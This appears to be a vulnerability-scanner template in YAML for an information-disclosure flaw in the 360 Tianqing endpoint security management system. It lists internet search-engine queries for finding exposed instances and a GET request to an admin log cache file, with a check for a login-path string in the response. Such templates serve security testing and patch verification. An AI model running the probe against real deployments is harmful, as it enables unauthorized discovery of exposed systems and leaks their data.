漏洞描述
fofa: title="360新天擎"
hunter: web.title="360新天擎"
zoomeye: app:"Tianqing terminal management"
id: qianxin-360tianqing-adminlogconf-disclosure
info:
name: 360新天擎终端安全管理系统信息泄露漏洞
author: zan8in
severity: high
verified: true
description: |-
fofa: title="360新天擎"
hunter: web.title="360新天擎"
zoomeye: app:"Tianqing terminal management"
reference:
- https://mp.weixin.qq.com/s/_Hoi_ESDEEIL81RY37nDcQ
tags: qianxin,360tianqing,disclosure
created: 2023/11/21
rules:
r0:
request:
method: GET
path: /runtime/admin_log_conf.cache
expression: response.status == 200 && response.body.bcontains(b's:12:"/login/login"')
expression: r0()